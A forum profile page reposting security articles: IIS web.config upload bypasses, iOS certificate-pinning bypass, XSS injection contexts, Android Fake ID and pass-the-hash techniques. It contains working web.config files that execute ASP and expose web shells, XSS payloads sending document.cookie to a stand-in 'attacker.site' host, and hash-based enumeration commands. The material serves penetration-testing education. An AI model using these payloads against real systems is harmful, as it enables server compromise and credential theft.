Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. [h=1]Upload a web.config File for Fun & Profit[/h] The web.config file plays an important role in storing IIS7 (and higher) settings. It is very similar to a .htaccess file in Apache web server. Uploading a .htaccess file to bypass protections around the uploaded files is a known technique. Some interesting examples of this technique are accessible via the following GitHub repository: https://github.com/wireghoul/htshells In IIS7 (and higher), it is possible to do similar tricks by uploading or making a web.config file. A few of these tricks might even be applicable to IIS6 with some minor changes. The techniques below show some different web.config files that can be used to bypass protections around the file uploaders. [h=2]Running web.config as an ASP file[/h] Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- ASP code comes here! It should not include HTML comment closing tag and double dashes! <% Response.write("-"&"->") ' it is running the ASP code if you can see 3 by opening the web.config file! Response.write(1+2) Response.write("<!-"&"-") %> --> [h=2]Removing protections of hidden segments[/h] Sometimes file uploaders rely on Hidden Segments of IIS Request Filtering such as APP_Data or App_GlobalResources directories to make the uploaded files inaccessible directly. However, this method can be bypassed by removing the hidden segments by using the following web.config file: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <security> <requestFiltering> <hiddenSegments> <remove segment="bin" /> <remove segment="App_code" /> <remove segment="App_GlobalResources" /> <remove segment="App_LocalResources" /> <remove segment="App_Browsers" /> <remove segment="App_WebReferences" /> <remove segment="App_Data" /> <!--Other IIS hidden segments can be listed here --> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> Now, an uploaded web shell file can be directly accessible. [h=2]Creating XSS vulnerability in IIS default error page[/h] Often attackers want to make a website vulnerable to cross-site scripting by abusing the file upload feature. The handler name of IIS default error page is vulnerable to cross-site scripting which can be exploited by uploading a web.config file that contains an invalid handler name (does not work in IIS 6 or below): <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers> <!-- XSS by using *.config --> <add name="web_config_xss<script>alert('xss1')</script>" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="fooo" resourceType="Unspecified" requireAccess="None" preCondition="bitness64" /> <!-- XSS by using *.test --> <add name="test_xss<script>alert('xss2')</script>" path="*.test" verb="*" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> <httpErrors existingResponse="Replace" errorMode="Detailed" /> </system.webServer> </configuration> [h=2]Other techniques[/h] Rewriting or creating the web.config file can lead to a major security flaw. In addition to the above scenarios, different web.config files can be used in different situations. I have listed some other examples below (a relevant web.config syntax can be easily found by searching in Google): Re-enabling .Net extensions: When .Net extensions such as .ASPX are blocked in the upload folder. Using an allowed extension to run as another extension: When ASP, PHP, or other extensions are installed on the server but they are not allowed in the upload directory. Abusing error pages or URL rewrite rules to redirect users or deface the website: When the uploaded files such as PDF or JavaScript files are in use directly by the users. Manipulating MIME types of uploaded files: When it is not possible to upload a HTML file (or other sensitive client-side files) or when IIS MIME types table is restricted to certain extensions. [h=2]Targeting more users via client-side attacks[/h] Files that have already been uploaded to the website and have been used in different places can be replaced with other contents by using the web.config file. As a result, an attacker can potentially target more users to exploit client-side issues such as XSS or cross-site data hijacking by replacing or redirecting the existent uploaded files. [h=2]Additional Tricks[/h] Sometimes it is not possible to upload or create a web.config file directly. In this case, copy, move, or rename functionality of the web application can be abused to create a web.config file. Alternate Data Stream feature can also be useful for this purpose. For example, “web.config::$DATA” can create a web.config file with the uploaded file contents, or “web.config:.txt” can be used to create an empty web.config file; and when a web.config file is available in the upload folder, Windows 8.3 filename (“WEB~1.con”) or PHP on IIS feature (“web<<”) can be used to point at the web.config file. Sursa: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
  2. Bypass iOS Version Check and Certification validation 7/28/2014 | NetsPWN Certain iOS applications check for the iOS version number of the device. Recently, during testing of a particular application, I encountered an iOS application that was checking for iOS version 7.1. If version 7.1 was not being used, the application would not install on the device and would throw an error. This blog is divided into three parts: Change version number value in SystemVersion.plist file Change version number value in plist file present in iOS application ipa. Use 'iOS-ssl-Kill switch' tool to bypass certificate validation. Change version number value in SystemVersion.plist file The version of the iOS device can be faked (on a jailbroken device) in two simple steps by changing the value in the SystemVersion.plist file: SSH into a jailbroken device (or use ifile, available on cydia) to browse through the system folder. Change the 'ProductVersion' value in the '/System/Library/CoreServices/SystemVersion.plist' file to the desired iOS version. Fig 1: iOS version can be faked by changing the value of ProductVersion key. This will change the version number displayed in version tab located in 'Settings/General/about' in the iOS device. Although this trick might work on some of the applications that check for the value saved in the '/System/Library/CoreServices/SystemVersion.plist' file, this trick won't work on every application. If it fails, we can use the second method given below. Change version number value in plist file present in iOS application ipa. If you are unsure about the method that the application is using to look for the version number, then we can use another simple trick to change the value in the iOS version. The version check in an IPA can be faked in three simple steps. Rename the ipa to .zip file and extract the folder. Find the info.plist file located usually in \Payload\appname.app and change the string 'minimum ios version' to the version you need Zip the file again and change it to ipa. [Note: Some of the applications can also use other plist files instead of the info.plist file to check for minimum version] Fig 2: MinimumOSVersion requirement defined in info.plist file in the IOS application. Manipulating any file inside the IPA will break the signature. So, to fix this problem, the IPA would need to be resigned. We can use the tool given here on Christoph Ketzler's blog. Some applications also perform the version check during the installation process. When a user tries to install the application using iTunes, or xcode using the IPA, the IPA checks for the version of iOS running on that device and if the version is lower than the minimum required version it will throw an error similar to the one given below. Fig 3: Error message while installing the application using xcode. The version check performed during the installation stage can be bypassed using this simple trick: Rename the .ipa application package to .zip and then extract the .app folder. Copy the .app folder to the path where iOS applications are installed (/root/application) using an SFTP client like WinSCP. SSH into the device and browse to the folder where the IPA is installed, then change the permission of the .app folder to executable (chmod -R 755 or chmod -R 777). Alternately you can change the permissions by right clicking the .app in WinSCP, change properties and check all the read, write, and execute permissions. Restart the iOS device and the application will be successfully installed. Fig 4: Changing permissions of the IPA to executable. iOS Certification validation bypass Some applications perform certification validation. Certification validation is performed to prevent application traffic from being proxied using a MitM proxy like Burp. Typically the application has a client certificate hard coded into the binary (i.e. the application itself). The server checks for this client certificate and if it does not match then it throws a certificate validation error. Refer to my co-worker Steve Kern's blog on Certificate Pinning in a Mobile Application for further details. Sometimes it is difficult to extract the certificate from the application and install it into the proxy. An alternative approach is to use a tool developed by iSEC Partners called ios-ssl-kill-switch. This tool hooks into the Secure Transport API, which is the lowest level of API, and disables the check for certificate validation. Most certificate validation techniques use NSURLConnection, which is a higher level API call to validate client certificates. More technical details can be found here. Bypassing Certificate validation can be performed in the following steps: Install the tool kill-ssl-switch Make sure the dependencies given on the installation page are installed prior to the installation of the software. Restart the device or restart SpringBoard using following command 'killall -HUP SpringBoard' Enable the Disable Certificate Validation Option in 'Settings/SSL Kill Switch' Restart the application and confirm that a MitM proxy can intercept the traffic successfully. Certificate pinning can be bypassed by hooking into the API which makes the check for certificate validation and return a true value for certificate validated all the time. Mobilesubstrate is a useful framework for writing tweaks for disabling certificate pinning checks. There are few other handy tools as well, like 'Trustme' by Intrepidusgroup and 'Snoop-it' by Nesolabs to disable Certificate pinning. Fig 5: Turn off certificate validation using SSL Kill Switch. Sursa: https://www.netspi.com/blog/entryid/236/bypass-ios-version-check-and-certification-validation
  3. Using SSL Certificates with HAProxy Posted 2014/07/29 I'm writing an eBook Servers for Hackers! Check out the page for more information - it should be out in early September. Overview If your application makes use of SSL certificates, then some decisions need to be made about how to use them with a load balancer. A simple setup of one server usually sees a client's SSL connection being decrypted by the server receiving the request. Because a load balancer sits between a client and one or more servers, where the SSL connection is decrypted becomes a concern. There are two main strategies. SSL Termination is the practice of terminating/decrypting an SSL connection at the load balancer, and sending unencrypted connections to the backend servers. This means the load balancer is responsible for decrypting an SSL connection - a slow and CPU intensive process relative to accepting non-SSL requests. This is the opposite of SSL Pass-Through, which sends SSL connections directly to the proxied servers. With SSL-Pass-Through, the SSL connection is terminated at each proxied server, distributing the CPU load across those servers. However, you lose the ability to add or edit HTTP headers, as the connection is simply routed through the load balancer to the proxied servers. This means your application servers will lose the ability to get the X-Forwarded-* headers, which may include the client's IP address, port and scheme used. Which strategy you choose is up to you and your application needs. SSL Termination is the most typical I've seen, but pass-thru is likely more secure. There is a combination of the two strategies, where SSL connections are terminated at the load balancer, adjusted as needed, and then proxied off to the backend servers as a new SSL connection. This may provide the best of both security and ability to send the client's information. The trade off is more CPU power being used all-around, and a little more complexity in configuration. An older article of mine on the consequences and gotchas of using load balancers explains these issues (and more) as well. Articol: Using SSL Certificates with HAProxy | Servers for Hackers
  4. Contexts and Cross-site Scripting - a brief intro Yesterday Anant posted a question in the IronWASP Facebook group asking about the different potential contexts related to XSS to better understand how context specific filtering is done. It would be hard to post the response in a comment so I am turning it in to a blog post instead.If you are the kind of person who likes reading code instead of text then download the source code of IronWASP and check out the CrossSiteScriptingCheck.cs file in the ActivePlugins directory, this post is based on the logic IronWASP uses for its XSS check. If user controlled input appears in some part of a web page and if this behaviour leads to the security of the site getting compromised in someway then the page is said to be affected by Cross-site Scripting. A web page is nothing but just text, the browser however does not look at it as a single monolithic blob of text, instead different sections of the page could be interpreted differently by the browser as HTML, CSS or JavaScript. Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page can have would depend on the context in which the browser tries to interpret the user input. I will try to list out the different contexts in which user input can occur in a web page. 1) Simple HTML Context In the body of an existing HTML tag or at the start and end of the page outside of the <html> tag. <some_html_tag> user_input </some_html_tag> In this context you can enter any kind of valid HTML in the user input and it would immediately be rendered by the browser, its an executable context. Eg: <img src=x onerror=alert(1)> 2) HTML Attribute Name Context Inside the opening HTML tag, after tag name or after an attribute value. <some_html_tag user_input some_attribute_name="some_attribute_value"/> In this context you can enter an event handler name and JavaScript code following an = symbol and we can have code execution, it can be considered to be an executable context. Eg: onclick="alert(1)" 3) HTML Attribute Value Context Inside the opening HTML tag, after an attribute name separated by an = symbol. <some_html_tag some_attribute_name="user_input" /> <some_html_tag some_attribute_name='user_input' /> <some_html_tag some_attribute_name=user_input /> There are three variations of this context: - Double quoted attribute - Single quoted attribute - Quote less attribute Code execution in this context would depend on the type of attribute in which the input appears. There are different types of attributes: a) Event attributes These are attributes like onclick, onload etc and the values of these attributes are executed as JavaScript. So anything here is the same as JavaScript context. URL attributes These are attributes that take URL as a value, for example src attribute of different tags. Entering a JavaScript URL here could lead to JavaScript execution Eg: javascript:some_javascript() c) Special URL attributes These are URL attributes where entering a regular URL can lead to security issues. Some examples are: <script src="user_input" <iframe src="user_input" <frame src="user_input" <link href="user_input" <object data="user_input" <embed src="user_input" <form action="user_input" <button formaction="user_input" <base href="user_input" <a href="user_input" Entering just an absolute http or https URL in these cases could affect the security of the website. In some cases if it is possible to upload user controlled data on to the server then even entering relative URLs here would lead to a problem. Some sites might strip off http:// and https:// from the values entered in these attributes to prevent absolute URLs from being entered but there are many ways in which an absolute URL can be specified. d) META tag attributes Meta tags like Charset can be influence how the contents of the page are interpreted by the browser. And then there is the http-equiv attribute, it can emulating the behaviour of HTTP response headers. Influencing the values of headers like Content-Type, Set-Cookie etc will have impact on the security of the page. e) Normal attributes If the input appears in a normal attribute value then this context must be escaped to lead to code execution. If the attribute is quoted then the corresponding quote must be used to escape the context. In case of unquoted attributes space or backslash should do the job. Once out of this context a new event handler can be added to lead to code execution. Eg: " onclick=alert(1) ' onclick=alert(1) onclick=alert(1) 4) HTML Comments Context Inside the comments section of HTML <!-- some_comment user_input some_comment --> This is a non-executable context and it is required to come out this context to execute code. Entering a --> would terminate this context and switch any subsequent text to HTML context. Eg: --><img src=x onerror=alert(1)> 5) JavaScript Context Inside the JavaScript code portions of the page. <script> some_javascript user_input some_javascript </script> This applies to the section enclosed by the SCRIPT tags, in event handler attributes values and in URLs preceding with javascript: . Inside JavaScript user input could appear in the following contexts: a) Code context Single quoted string context c) Double quoted string context d) Single line comment context e) Multi-line comment context f) Strings being assigned to Executable Sinks If user input is between SCRIPT tags then, no matter in which of the above contexts it appears you can switch to the HTML context simply by including a closing SCRIPT tag and then insert any HTML. Eg: </script><img src=x onerror=alert(1)> If you are not going to switch to HTML context then you have to tailor the input depending on the specific JavaScript context it appears in. a) Code Context function dev_func(input) {some_js_code} dev_func(user_input); some_variable=123; This is an executable context, user input directly appears as an expression and you can directly enter JavaScript statements and they will be executed. Eg: $.post("http://attacker.site", {'cookie':document.cookie}, function(){})// Single quoted string context var some_variable='user_input'; This is a non-executable context and the user input must include a single quote at the beginning to switch out of the string context and enter the code context.. Eg: '; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})// c) Double quoted string context var some_variable="user_input"; This is a non-executable context and the user input must include a double quote at the beginning to switch out of the string context and enter the code context.. Eg: "; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})// d) Single-line comment context some_js_func();//user_input This is a non-executable context and the user input must include a new line character to terminate the single line comment context and switch to the code context.. Eg: \r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})// e) Multi-line comment context some_js_func(); /* user_input */ some_js_code This is a non-executable context and the user input must include*/ to terminate the multi-line comment context and switch to the code context.. Eg: */$.post("http://attacker.site", {'cookie':document.cookie}, function(){})// f) Strings being assigned to Executable Sinks These are single quoted or double quoted string contexts but the twist is that these strings are passed to a function or assigned to a property that would treat this string as executable code. Some examples are: eval("user_input"); location = "user_input"; setTimeout(1000, "user_input"); x.innerHTML = "user_input"; For more sinks refer the DOM XSS wiki. This should be treated similar to Code context. 6) VB Script Context This is very rare these days but still there might that odd site that uses VBScript. <script language="vbscript" type="text/vbscript"> some_vbscript user_input some_vbscript </script> Like JavaScript, you could switch out to HTML context with the </SCRIPT> tag. Inside VBScript user input could appear in the following contexts: a) Code context Single-line comment c) Double quoted string context d) Strings being assigned to Executable Sinks a) Code Context Similar to its JavaScript equivalent, you can directly enter VBScript Single-line comment VBScript only has single-line comments and similar to its JavaScript equivalent entering a new line character will terminate the comment context and switch to code context c) Double quoted string Similar to its JavaScript equivalent d) Strings being assigned to Executable Sinks Similar to its JavaScript equivalent 7) CSS Context Inside the CSS code portions of the page. <style> some_css user_input some_css </style> This applies to the section enclosed by the STYLE tags and in style attributes values. Injecting CSS in to a page itself could have some kind of impact of the page. For example, by changing the location, visibility, size and z-index of the elements in a page it might be possible to make the user perform an action different from what they think they are doing. But the more interesting aspect is in how JavaScript can be executed from within CSS. Though, not possible in modern browsers older browser did support JavaScript execution in two ways. i. expression property expression is a Internet Explorer only feature that allows execution of JavaScript embedding inside CSS. css_selector { property_name: expression(some_javascript); } ii. JavaScript URLs Some CSS properties like the background-image property take an URL as their value. In older browsers, entering a JavaScript URL here would result in JavaScript code being executed. css_selector { background-image: javascript:some_javascript() } Inside CSS user input could appear in the following contexts: a) Statement context Single quoted/Double quoted string context c) Multi-line comment context d) Strings being assigned to Executable Sinks Similar to the SCRIPT tag, if user input is between STYLE tags then you can switch to the HTML context simply by including a closing STYLE tag and then insert any HTML. Eg: </script><img src=x onerror=alert(1)> If you are not going to switch to HTML context then you have to tailor the input depending on the specific JavaScript context it appears in. a) Statement Context In this context you can directly start including CSS to modify the page for a social engineering attack or make use of expression property or the JavaScript URL method to inject JavaScript code. Single quoted/Double quoted string context Including a single or double quote at the start of the input would terminate the string context and switch to statement context. c) Multi-line comment context Similar to JavaScript multi-line comment, entering */ would terminate the comment context and switch to statement context. d) Strings being assigned to Executable Sinks This is a single-quoted are double-quoted string that is either passed to the expression property or a property that takes an URL like background-image. In both cases the data inside the string context can be interpreted as JavaScript code by the browser. Though I have mentioned the standard way to escape out of the different contexts, these are by no means the only ways. There are plenty of browser quirks that allow escaping out of contexts in strange ways. To find out about them I would recommend you get the Web Application Obfuscation book and also refer the HTML5 Security Cheatsheet and the fuzz results of Shazzer. There is a good change you might already know about OWASP's XSS Prevention CheatSheet, you might also find this other XSS Protection Cheat Sheet to be useful. Posted by IronWASP at 5:56 AM Sursa: IronWASP - Open Source Advanced Web Security Testing Platform: Contexts and Cross-site Scripting - a brief intro
  5. [h=1]HIP14 :C+11 metaprogramming technics applied to software obduscation[/h] Publicat pe 29 iul. 2014 By Sebastien Andrivet Hack in Paris:the leading IT security technical event in France organized by Sysdream
  6. [h=1]HIP14-Defeating UEFI/WIN8 secureboot[/h] Kw-domjg5UkbN-pLc Publicat pe 29 iul. 2014 By John Butterworth Hack in Paris:the leading IT security technical event in France organized by Sysdream
  7. [h=1]HIP14-Pentesting NoSQL exploitation framework[/h] IKw-domjg5UkbN-pLc Publicat pe 29 iul. 2014 By Francis Alexander Hack in Paris:the leading IT security technical event in France organized by Sysdream
  8. [h=1]HIP14-Fuzzing reversing and maths[/h] IKw-domjg5UkbN-pLc Publicat pe 29 iul. 2014 By Josep Pi Rodriguez & Pedro Guillen Nunez Hack in Paris:the leading IT security technical event in France organized by Sysdream
  9. [h=1]HIP14-ARM AARCH64 writing exploits for the new arm architecture[/h] Kw-domjg5UkbN-pLc Publicat pe 29 iul. 2014 By Thomas Roth Hack in Paris: the leading IT security technical event in France organized by Sysdream
  10. [h=3]Defensible Network Architecture 2.0[/h]Four years ago when I wrote The Tao of Network Security Monitoring I introduced the term defensible network architecture. I expanded on the concept in my second book, Extrusion Detection. When I first presented the idea, I said that a defensible network is an information architecture that is monitored, controlled, minimized, and current. In my opinion, a defensible network architecture gives you the best chance to resist intrusion, since perfect intrusion prevention is impossible. I'd like to expand on that idea with Defensible Network Architecture 2.0. I believe these themes would be suitable for a strategic, multi-year program at any organization that commits itself to better security. You may notice the contrast with the Self-Defeating Network and the similarities to my Security Operations Fundamentals. I roughly order the elements in a series from least likely to encounter resistance from stakeholders to most likely to encounter resistance from stakeholders. A Defensible Network Architecture is an information architecture that is: Monitored. The easiest and cheapest way to begin developing DNA on an existing enterprise is to deploy Network Security Monitoring sensors capturing session data (at an absolute minimum), full content data (if you can get it), and statistical data. If you can access other data sources, like firewall/router/IPS/DNS/proxy/whatever logs, begin working that angle too. Save the tougher data types (those that require reconfiguring assets and buying mammoth databases) until much later. This needs to be a quick win with the data in the hands of a small, centralized group. You should always start by monitoring first, as Bruce Schneier proclaimed so well in 2001. Inventoried. This means knowing what you host on your network. If you've started monitoring you can acquire a lot of this information passively. This is new to DNA 2.0 because I assumed it would be already done previously. Fat chance! Controlled. Now that you know how your network is operating and what is on it, you can start implementing network-based controls. Take this anyway you wish -- ingress filtering, egress filtering, network admission control, network access control, proxy connections, and so on. The idea is you transition from an "anything goes" network to one where the activity is authorized in advance, if possible. This step marks the first time where stakeholders might start complaining. Claimed. Now you are really going to reach out and touch a stakeholder. Claimed means identifying asset owners and developing policies, procedures, and plans for the operation of that asset. Feel free to swap this item with the previous. In my experience it is usually easier to start introducing control before making people take ownership of systems. This step is a prerequisite for performing incident response. We can detect intrusions in the first step. We can only work with an asset owner to respond when we know who owns the asset and how we can contain and recover it. Minimized. This step is the first to directly impact the configuration and posture of assets. Here we work with stakeholders to reduce the attack surface of their network devices. You can apply this idea to clients, servers, applications, network links, and so on. By reducing attack surface area you improve your ability to perform all of the other steps, but you can't really implement minimization until you know who owns what. Assessed. This is a vulnerability assessment process to identify weaknesses in assets. You could easily place this step before minimization. Some might argue that it pays to begin with an assessment, but the first question is going to be: "What do we assess?" I think it might be easier to start disabling unnecessary services first, but you may not know what's running on the machines without assessing them. Also consider performing an adversary simulation to test your overall security operations. Assessment is the step where you decide if what you've done so far is making any difference. Current. Current means keeping your assets configured and patched such that they can resist known attacks by addressing known vulnerabilities. It's easy to disable functionality no one needs. However, upgrades can sometimes break applications. That's why this step is last. It's the final piece in DNA 2.0. So, there's DNA 2.0 -- MICCMAC (pronounced "mick-mack"). You may notice the Federal government is adopting parts of this approach, as mentioned in my post Feds Plan to Reduce, then Monitor. I prefer to at least get some monitoring going first, since even incomplete instrumentation tells you what is happening. Minimization based on opinion instead of fact is likely to be ugly. Did I miss anything? Posted by Richard Bejtlich at 22:22 Sursa: TaoSecurity: Defensible Network Architecture 2.0
  11. Android crypto blunder exposes users to highly privileged malware "Fake ID" exploits work because Android doesn't properly inspect certificates. by Dan Goodin - July 29 2014, 2:00pm GTBST A slide from next week's Black Hat talk titled Android Fake ID vulnerability. Bluebox Security The majority of devices running Google's Android operating system are susceptible to hacks that allow malicious apps to bypass a key security sandbox so they can steal user credentials, read e-mail, and access payment histories and other sensitive data, researchers have warned. The high-impact vulnerability has existed in Android since the release of version 2.1 in early 2010, researchers from Bluebox Security said. They dubbed the bug Fake ID, because, like a fraudulent driver's license an underage person might use to sneak into a bar, it grants malicious apps special access to Android resources that are typically off-limits. Google developers have introduced changes that limit some of the damage that malicious apps can do in Android 4.4, but the underlying bug remains unpatched, even in the Android L preview. The Fake ID vulnerability stems from the failure of Android to verify the validity of cryptographic certificates that accompany each app installed on a device. The OS relies on the credentials when allocating special privileges that allow a handful of apps to bypass Android sandboxing. Under normal conditions, the sandbox prevents programs from accessing data belonging to other apps or to sensitive parts of the OS. Select apps, however, are permitted to break out of the sandbox. Adobe Flash in all but version 4.4, for instance, is permitted to act as a plugin for any other app installed on the phone, presumably to allow it to add animation and graphics support. Similarly, Google Wallet is permitted to access Near Field Communication hardware that processes payment information. According to Jeff Forristal, CTO of Bluebox Security, Android fails to verify the chain of certificates used to certify an app belongs to this elite class of super privileged programs. As a result, a maliciously developed app can include an invalid certificate claiming it's Flash, Wallet, or any other app hard coded into Android. The OS, in turn, will give the rogue app the same special privileges assigned to the legitimate app without ever taking the time to detect the certificate forgery. "All it really takes is for an end user to choose to install this fake app, and it's pretty much game over," Forristal told Ars. "The Trojan horse payload will immediately escape the sandbox and start doing whatever evil things it feels like, for instance, stealing personal data." Other apps that receive special Android privileges include device management extensions from a company known as 3LM. Organizations use such apps to add security enhancements and other special features to large fleets of phones. An app that masqueraded as one of these programs could gain almost unfettered administrative rights on phones that were configured to work with the manager. Forristal hasn't ruled out the existence of other apps that are automatically assigned heightened privileges from Android. Changes introduced in Android 4.4 limit some of the privileges Android grants to Flash. Still, Forristal said the failure to verify the certificate chain is present in all Android devices since 2.1. That means malicious apps can bypass sandbox restrictions by impersonating Google Wallet, 3LM managers, and any other apps Android is hardcoded to favor. A spokesman for Google issued the following statement: We appreciate Bluebox responsibly reporting this vulnerability to us; third-party research is one of the ways Android is made stronger for users. After receiving word of this vulnerability, we quickly issued a patch that was distributed to Android partners, as well as to AOSP. Google Play and Verify Apps have also been enhanced to protect users from this issue. At this time, we have scanned all applications submitted to Google Play as well as those Google has reviewed from outside of Google Play, and we have seen no evidence of attempted exploitation of this vulnerability. The statement didn't say exactly what Google did to patch the vulnerability or specify if any Android partners have yet to distribute it to end users. This article will be updated if company representatives elaborate beyond the four sentences above. As Ars has documented previously, it's not unusual for attackers to sneak malicious apps into the official Google Play marketplace. If it's possible for approved apps to contain cryptocurrency miners, remote access trojans, or other hidden functions, there's no obvious reason they can't include cryptographic credentials fraudulently certifying they were spawned by 3LM, Google, Microsoft, or any other developer granted special privileges. "With this vulnerability, malware has a way to abuse any one of these hardcoded identities that Android implicitly trusts," said Forristal, who plans to divulge additional details at next week's Black Hat security conference. "So malware can use the fake Adobe ID and become a plugin to other apps. Malware can also use the 3LM to control the entire device." Listing image courtesy of Greayweed. Sursa: Android crypto blunder exposes users to highly privileged malware | Ars Technica
  12. devttys0 released this 3 days ago · 11 commits to master since this release Highlights: Python3 support Raw deflate detection/extraction Improved API Improved speed More (and improved) signatures Faster entropy scans Much more... Lots of thanks to everyone who submitted patches and bug reports! Sursa: https://github.com/devttys0/binwalk/releases/tag/v2.0.0
  13. Pass-the-Hash is Dead: Long Live Pass-the-Hash July 29, 2014 by harmj0y You may have heard the word recently about how a recent Microsoft patch has put all of us pentesters out of a job. Pass-the-hash is dead, attackers can no longer spread laterally, and Microsoft has finally secured its authentication mechanisms. Oh wait: This is a fully-patched Windows 7 system in a fully-patched Windows 2012 domain. So what’s going on here, what has Microsoft claimed to do, what have they actually done, and what are the implications of all of this? The security advisory and associated knowledge base article we’re dealing with here is KB2871997 (aka the Mimikatz KB Besides backporting some of the Windows 8.1 protections that make extracting plaintext credentials from LSASS slightly more difficult, the advisory includes this ominous (to pentesters, at least) statement “Changes to this feature include: prevent network logon and remote interactive logon to domain-joined machine using local accounts…“. On the surface, this looks like it totally quashes the Windows pivoting vectors we’ve been taking advantage of for so long, [insert doom and gloom here]. Microsoft even originally titled their original advisory, “Update to fix the Pass-The-Hash Vulnerablity”, but quickly changed it to “Update to improve credentials protection and management” http://www.infosecisland.com/blogview/23787-Windows-Update-to-Fix-Pass-the-Hash-Vulnerability-Not.html It’s true, Microsoft has definitely raised the bar: accounts that are members of the localgroup “Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. Oh, except (as pwnag3 reports and our experiences confirm) the RID 500 built-in Administrator account, even if it’s renamed. While Windows 7 installs will now disable this account by default and prompt for a user to set up another local administrator, many organizations used to standard advice and compliance still have loads of RID 500 accounts, enabled, all over their enterprise. Some organizations rely on this account for backwards compatibility reasons, and some use it as a way to perform vulnerability scans without passing around Domain Admin credentials. If a domain is built using only modern Windows OSs and COTS products (which know how to operate within these new constraints), and configured correctly with no shortcuts taken, then these protections represent a big step forward. Microsoft has finally start to wise up to some of its inherent security issues, which I seriously applaud them for. However, the vast majority of organizations are a Frankensteinian amalgamation of security/management products, old (and sometimes unpatched) servers, heterogenous clients, lazy admins, backwards-compatibility-focused engineers, and usability-focused business units. Regardless, accounts with this security identifier are almost certainly going to be enabled and around for a while. Additionally, Windows 2003 isn’t affected (which will surely linger around organizations significantly longer than Windows XP), and domain accounts which maintain Administrative access over a machine can still have their hashes passed to your heart’s content. Also, these local admin accounts should still work with psremoting if it’s enabled. Some organizations will leave the WinRM service still running as an artifact of deployment, and while you can’t use hashes for auth in this case, plaintext credentials can be specified for a remote PowerShell session. But let’s say everything’s set up fairly well, the default Administrator account is disabled, and you end up dumping the hash of another local admin user on a box. How is this going to look in the field when you try your normal pivoting, and what options are still open? Your favorite scanner will still likely flag the credentials as valid on machines with the same account reused, as the following examples with the local admin of ‘mike:password’ demonstrates: However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket’s functionality to browse the file shares, you’ll encounter something like this: The “pth-winexe” example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151. But be careful: if you’re going after a Windows 7 machine and a domain user is currently logged on, it will politely ask them if they want to allow your remote session in, meaning this is probably best left for after-hours. Also, interesting note: if you have hashes for a domain user and are dealing with the new restricted admin mode, you might be able to pass-the-hash with rdp itself! The Kali linux guys have a great writeup on doing just that with xfreerdp. So here we are, with the RID 500 local Administrator account, as well as any domain accounts granted administrative privileges over a machine, still being able to utilize Metasploit or the passing-the-hash toolkit to install agents or execute code on target systems. Seems like it would be useful to be able to enumerate what name the local RID 500 account is currently using, as well as any network users in the local Administrators group. Unfortunately, even if you get access to a basic user account on some target machine and get in a position to abuse Active Directory, you can’t query local administrators with WMI as you might like: But all hope is not lost, with backwards-compatibility, the bane of Microsoft’s existence, once again coming to our aid. The Active Directory Service Interfaces [ADSI] WinNT provider, can be used to query information from domain-attached machines, even from non-privileged user accounts. A remnant of NT4 domain deployments, the WinNT provider in some cases can allow a non-privileged domain user to query information from target machines, including things like all the local groups and associated members (with SIDs and all). If we have Powershell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like: $computer = [ADSI]“WinNT://WINDOWS2,computer” $computer.psbase.children | where { $_.psbase.schemaClassName -eq ‘group’ } | foreach { ($_.name)[0]} If we want the members of a specific group, that’s not hard either: $members = @($([ADSI]“WinNT://WINDOWS2/Administrators”).psbase.Invoke(“Members”)) $members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) } These functions have been integrated into Veil-PowerView, Get-NetLocalGroups and Get-NetLocalGroup respectively: Another function, Invoke-EnumerateLocalAdmins, has also been built and integrated. This will query the domain for hosts, and enumerate every machine for members of a specific local group (default of ‘Administrators’). There are options for host lists, delay/jitter between host enumerations, and whether you want to pipe everything automatically to a csv file: This gives you some nice, sortable .csv output with the server name, account, whether the name is a group or not, whether the account is enabled, and the full SID associated with the account. The built-in Administrator account is the one ending in *-500: And again, this is all with an unprivileged Windows domain account. If you just have a hash and want the same information without having to use PowerShell, the Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along a password or hash: nmap -p U:137,T:139 –script-args ‘smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c’ –script=smb-enum-groups –script=smb-enum-users 192.168.52.151 If you want to use a domain account, set your flags to something like –script-args ‘smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X’. You’ll be able to enumerate the RID 500 account name and whether it’s disabled, as well as all the members of the local Administrators group on the machine. If there’s a returned member of the Administrator group that doesn’t show up in the smb-enum-users list, like ‘Jason’ in this instance, it’s likely a domain account. This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target. If you have any issues or questions with PowerView, submit any issues to the official Github page, hit me up on Twitter at @harmj0y, email me at will [at] harmj0y.net, or find me on Freenode in #veil, 